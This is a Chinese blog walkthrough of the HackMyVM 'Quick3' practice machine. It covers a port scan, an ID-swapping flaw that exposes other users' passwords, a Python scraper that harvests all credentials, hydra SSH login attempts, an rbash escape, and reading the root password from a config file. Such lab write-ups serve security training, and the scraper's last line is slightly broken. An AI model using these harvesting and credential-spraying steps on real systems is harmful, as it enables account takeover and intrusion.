Quick3 - hackmyvm

已于 2024-02-20 20:14:48 修改
阅读量352 收藏 6
点赞数 6
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux
于 2024-02-20 20:13:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/136197889
版权

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3

本地环境

虚拟机:vitual box

靶场IP(quick3):192.168.56.105

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

小型靶场,nmap跑一下全端口即可

nmap -p 1-65535 -T4 -A -v 192.168.56.105

image-20240220170813671

确定目标位22端口和80端口

http服务

这次网页和以往的不太一样。不存在LFI,路径爆破也没有有价值的东西。

image-20240220181621464

点击主页右上角的"make appointment",即可进入一个登陆界面。随便注册个号进入。

image-20240220181734753

点击右上角的"My Profile"进入个人页面

image-20240220181828741

在"Change Password"选项中发现可以直接获取密码

image-20240220182059261

因为URL的形式是/customer/user.php?id=29,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了

image-20240220182343619

用这种方式可以获取所有用户的密码。简单写个爬虫收集信息:

import requests
from bs4 import BeautifulSoup as bs
from tqdm import tqdm

def getHTMLText(url,header= {'User-Agent': 'Mozilla/5.0'}):
    r = requests.get(url,headers=header,timeout=30)
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    print ("URL地址为:", r.url)
    return r.text


url='http://192.168.56.105/customer/user.php'
ck = 'PHPSESSID=5um04uhc6a82h0udeb0a83li9r'
header = {'User-Agent': 'Mozilla/5.0','Connection': 'keep-alive','Cookie': ck}

username = []
passwd = []
mail = []
for i in tqdm(range(1,29)):
    urlt = url + "/?id=" + str(i)
    text = getHTMLText(urlt,header)
    soup = bs(text,'lxml')

    username.append(soup.find("div",class_="contact_inner").h3.text)
    passwd.append(soup.find('input',attrs={'id':'oldpassword'})['value'])

with open("res.txt","w") as f:
    for i in range(len(username)):
        f.write(username[i].split()[0].lower()+":"+passwd[i]"\n")

这里我专门针对用户名处理了一下,一般用户取名会用姓

image-20240220192523716

爆破ssh

这里我选择hydra

hydra -C ./res.txt 192.168.56.105 ssh

image-20240220192833502

登录,用户目录下拿到user.txt

HMV{717f274ee66f8541a3031f175f615e72}

提权

值得一提的是,现在默认的shell是rbash,也就是权限收到更多限制的shell。这里直接输入bash就能跳出rbash了。

image-20240220200256856

linpeas没能跑出能直接用的漏洞,再继续收集点信息,从config.php找到root密码

fastandquicktobefaster

image-20240220200651437

直接su,然后得到root.txt

HMV{f178761104e933f9341f13f64b38538a}

古明地核
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QuickLook-3.6.11.msi
06-09
QuickLook-3.6.11.msi
QuickLook-3.6.5.zip
03-17
QuickLook-3.6.5.zip 官网下载 https://github.com/QL-Win/QuickLook/releases
quick4 - hackmyvm
tanbinn的博客
06-09 264
hackmyvmquick4靶场
Quick3 - hackmyvm,2024年最新膜拜大佬
2401_83739529的博客
04-18 682
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~点击主页右上角的"make appointment",即可进入一个登陆界面。的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了。用这种方式可以获取所有用户的密码。
Quick3 - hackmyvm,2024年BATJ30套大厂网络安全经典高频面试题
m0_61330806的博客
04-06 837
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Quick2 - HackMyVM
tanbinn的博客
02-19 378
hackmyvmquick2靶场
electron-quick-start-master 快速入门教程
05-31
electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程...
quickfix-1.15.1-cp38-cp38-win32
08-19
quickfix-1.15.1-cp38-cp38-win32
quick-lint-js:quick-lint-js发现JavaScript程序中的错误
04-12
quick-lint-js quick-lint-js发现JavaScript程序中的错误。 警告:这是预发行软件。 quick-lint-js正在积极开发中,并且不稳定。 使用风险自负。 quick-lint-js发现许多错误,包括: 使用不存在的变量分配给const...
安全Linux Fanotify使用入门
追寻梦想的青春
06-19 674
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
c++中串口的安全封装使用
最新发布
jjjxxxhhh123的博客
06-21 214
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
安全】软件系统安全开发指南文件(指南)
xx_123321456的博客
06-21 175
2.2.应用系统软件功能安全设计要求。2.1.应用系统架构安全设计要求。2.5.应用系统数据库安全设计要求。2.3.应用系统存储安全设计要求。2.4.应用系统通讯安全设计要求。2.6.应用系统数据安全设计要求。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 226
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全
vmlogin888的博客
06-18 497
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
HSE在企业中的重要性:健康、安全与环境的全面保障
shuntian88的博客
06-18 468
通过健康风险评估、安全培训、风险管理和环境保护措施,企业不仅保障员工的健康和安全,还推动环境的可持续发展。定期监测员工的健康状况,及时发现和处理与工作环境相关的健康问题,预防职业病,确保员工保持良好的身体状态,提高工作效率和满意度。系统化的风险评估和管理,预防健康、安全和环境风险,减少事故和职业病的发生,保障员工和环境的安全。通过有效的HSE管理,企业在员工、社会和环境之间实现良好平衡,促进各方利益的共同发展。健康安全的工作环境和高效的资源管理,提升员工工作效率,优化企业运营流程。HSE管理的综合效益。
渗透测试之内核安全系列课程:Rootkit技术初探(六)
fearhacker的专栏
06-19 735
例如,它包含驱动类型、驱动大小、驱动对象、驱动标志、驱动的起始位置、驱动的大小、指向驱动程序映像的内存区对象、驱动的扩展空间、驱动名字等。DRIVER_OBJECT对象还包含了与驱动程序所管理的设备对象相关联的设备扩展结构,以及用于处理I/O请求的函数指针等信息。:这是一个指针,指向驱动程序所创建的设备对象链表的头部。:指向注册表中的硬件信息路径,为驱动程序提供设备特定的配置和参数( 在Windows内核模式驱动程序中,硬件数据库用于存储有关系统中所有设备实例的信息,如设备的设备路径、设备对象指针等 )。
【RK3588/算能/Nvidia智能盒子】AI算法应用于中国生物疫苗生产过程智能监测,赋能生产安全,提升品质管控
YEYUANGEN的专栏
06-19 819
AI赋能医药疫苗安全生产,将被动“监督”变为主动“监控”,事前实时预警,事中常态监测,事后规范管理,实现车间作业标准化、人员行为可控化、决策分析层级化,真正做到疫苗生产过程的信息化管理。基于计算机视觉检测技术在疫苗生产过程中标准动作及流程监管方面拥有的巨大潜力,将深入药企生产的更多场景,研发更多优质实用的AI视觉算法,推动医药行业的智能化发展。,大大提高检测效率,有着传统人工目检不具备的优势,对食品药品生产过程的风险排查及质量管控提供了新的监管思路。等,实现疫苗生产中灭活剂添加流程的规范性监管。
可燃气体报警器检定检验:江门工业安全新保障的实践与思考
BDjiance的博客
06-19 340
随着工业化进程的加快,可燃气体在江门工业生产中的应用越来越广泛。在这一背景下,可燃气体报警器的准确性和可靠性对于保障工业安全至关重要。接下来,佰德将深入探讨可燃气体报警器的重要性、江门工业的应用现状、检定检验流程、实际案例分享、数据支撑效果以及总结与展望。
quicklook-3.6.11.msi
07-15
### 回答3: quicklook-3.6.11.msi是一个Windows安装程序,用于安装QuickLook软件的版本3.6.11。QuickLook是一个轻量级的文件预览工具,可以在不打开文件的情况下快速查看文件的内容。该软件支持预览多种文件类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值